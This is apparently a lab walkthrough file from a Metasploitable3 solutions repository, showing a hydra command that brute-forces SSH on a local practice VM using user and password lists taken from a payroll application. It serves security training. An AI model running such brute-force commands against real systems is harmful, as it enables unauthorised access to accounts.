metasploitable3-solutions/SSH_Bruteforce.md

9 lines
327 B
Markdown
Raw Permalink Normal View History

2019-06-13 10:27:46 +02:00
# SSH Bruteforce with thc-hydra
2019-06-13 10:27:13 +02:00
2019-06-13 10:14:35 +02:00
1. After extracting credentials from the Payroll Application, use the credentials to run a bruteforce attack.
```
hydra -L user.txt -P pass.txt ssh://127.0.0.1:2222
```
2019-06-13 10:18:16 +02:00
![alt text](https://github.com/ACIC-Africa/metasploitable3/blob/master/images/ssh-bruteforce/SSH_Bruteforce.png "Result 1")